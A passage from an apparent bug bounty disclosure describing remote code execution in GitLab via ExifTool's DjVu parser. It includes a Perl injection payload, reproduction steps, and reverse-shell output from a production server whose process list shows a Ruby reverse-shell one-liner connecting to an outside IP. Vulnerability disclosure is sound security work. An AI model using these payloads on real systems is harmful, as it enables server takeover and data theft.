[jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 